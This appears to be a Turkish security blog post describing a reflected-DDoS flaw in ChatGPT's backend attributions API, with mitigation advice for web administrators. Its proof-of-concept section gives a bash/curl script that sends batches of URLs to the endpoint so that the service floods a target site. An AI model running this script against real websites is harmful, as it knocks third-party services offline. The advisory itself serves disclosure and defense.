OpenAI’nin ChatGPT API’sinde keşfedilen ciddi bir güvenlik açığı, saldırganların bu altyapıyı yansımalı Dağıtılmış Hizmet Engelleme (DDoS) saldırıları başlatmak için kullanmalarına olanak tanıyor. Bu açık, CVSS puanının 8.6 gibi yüksek bir değere sahip olması nedeniyle, AI hizmetlerinin bulut platformlarında, özellikle de Microsoft Azure üzerinde çalıştırılmasının güvenliği konusunda endişelere yol açmaktadır.
Zafiyetin Kaynağı ve Etkileri
ChatGPT API’sinin, https://chatgpt.com/backend-api/attributions adresine yönlendirilen HTTP POST isteklerini işleme şekli, bu açığın temelini oluşturuyor. Saldırganlar, bu API’yi manipüle ederek, çok sayıda URL içeren tek bir istek gönderebilir. Sistem, gelen verilerin doğrulamasını yapmadan, tek bir POST isteğiyle onlarca hatta binlerce URL’i kabul edebiliyor.
Bunun sonucunda, ChatGPT API’si, her URL için hedeflenen web sitesine bir istek gönderiyor. Ancak API, aynı URL’lerin tekrarını kontrol etmediği ve bağlantı sayısını sınırlamadığı için bu istekler, Microsoft Azure üzerindeki çok sayıda IP adresinden hedef sunucuya gönderilerek, web sitesini aşırı yükleyebilir. Bu durum, hedefin sunucusunu kolayca tıkanmasına ve kesintiye uğramasına neden olabilir.
Bu güvenlik açığının, veri gizliliği veya bütünlüğü konusunda doğrudan bir tehdit oluşturmasa da, sunucuya gönderilen çok büyük miktardaki trafik, hedef web sitesinin normal operasyonlarını ciddi şekilde bozabilir. Bu tür saldırılar, finansal ve itibar kayıplarına yol açabilir.
Etkilenen Sürümler ve Dosyalar
Bu açık, ChatGPT API’sinin çeşitli sürümleri ve Microsoft Azure üzerindeki altyapı ile ilişkilidir. Yetersiz doğrulama mekanizmaları ve trafik limitlerinin olmaması, saldırganların API’yi manipüle etmelerine olanak sağlar. Bu nedenle, tüm API sürümleri bu saldırıya açık durumdadır.
Kanıt ve Deneysel Test
Güvenlik araştırmacıları, bu açıkla ilgili basit bir proof-of-concept (PoC) hazırlayarak, bu zafiyetin nasıl kullanılabileceğini göstermiştir. Aşağıda, saldırganların hedef web sitesine 50 HTTP isteği göndermesine olanak sağlayan bir bash script örneği bulunmaktadır:
#!/bin/bash
echo {1..50} | tr ' ' '\n' | (
while read -r i;
do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt";
done
) | jq -R -s -j -c '{ "urls": split("\n")[:-1] }' \
| curl -v --http1.1 \
-H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, like Gecko) Chrome/133.0.0.1 Safari/535.32' \
-H "content-type: application/json" \
-H 'origin: https://www.chatgpt.com' \
--data-binary @- -X POST 'https://chatgpt.com/backend-api/attributions'
Bu script, her URL için bir istek gönderir ve hedef sunucuda bağlantıların hızla artmasına neden olur. Web sitesinin günlük dosyaları, bu tür saldırıların ardından birden fazla bağlantı denemesinin saniyeler içinde gerçekleştiğini gösteriyor. Başarılı bir saldırı, sunucu üzerinde ciddi bir hizmet kesintisine yol açabilir.
Çözüm ve Öneriler
Bu tür saldırıların önüne geçebilmek için hemen uygulanması gereken bazı adımlar şunlardır:
- Trafik İzleme: Web yöneticilerinin, DDoS saldırıları sırasında gelen trafiği izlemeleri ve anormal artışları tespit etmeleri önemlidir.
- Rate Limiting (Hız Sınırlandırma): Belirli IP adreslerinden gelen isteklerin hızını sınırlayarak, saldırganların yüksek hacimli istekler göndermesinin önüne geçilebilir.
- Web Uygulama Güvenlik Duvarları (WAF): WAF’lar kullanılarak, kötü amaçlı trafiğin etkin bir şekilde filtrelenmesi sağlanabilir.
- İnternet Servis Sağlayıcılarıyla İletişim: ISP’ler ile iletişime geçerek, aşırı trafik ile başa çıkmak için destek alınabilir.
Sonuç ve Öneriler
Bu güvenlik açığı, yazılım mühendisliği ve kalite kontrol süreçlerinde ciddi eksikliklere işaret etmektedir. ChatGPT gibi yüksek trafikli uygulamaların daha güçlü doğrulama ve sınırlandırma mekanizmalarına sahip olması gerekmektedir. OpenAI ve Microsoft, bu açığı gidermek için hızlı bir şekilde önlem almalıdır. Bununla birlikte, web yöneticilerinin de bu tür zafiyetlere karşı dikkatli olmaları ve uygun güvenlik önlemleri alarak altyapılarını korumaları büyük önem taşımaktadır.
Bu tür yüksek öneme sahip zafiyetlerin hızlı bir şekilde tespit edilip çözülmesi, dijital altyapıların güvenliği açısından kritik öneme sahiptir. Web yöneticilerinin ve güvenlik uzmanlarının, potansiyel tehditlere karşı hazırlıklı olmaları ve proaktif önlemler almaları gerekmektedir.
#CyberSecurity #NetworkSecurity #DDoS #AI #OpenAI #ChatGPT #Vulnerability #WebSecurity #Azure #SecurityResearch
About the Author
